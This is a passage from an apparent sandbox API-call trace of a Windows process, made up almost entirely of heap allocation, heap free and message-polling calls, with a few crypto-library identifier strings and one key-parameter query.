(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.694] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.694] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0031.694] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.694] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0031.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.695] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0031.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da238 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0031.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd30 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0031.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0031.695] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.695] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.695] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.696] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0031.696] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.696] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.697] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.697] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.697] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.698] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.698] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.698] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0031.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0031.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0031.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.701] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0031.701] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2d8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2d8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.701] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.701] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.701] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.701] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.701] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.701] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.702] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.702] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0031.702] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.702] HeapFree (in: hHeap=0x770000, 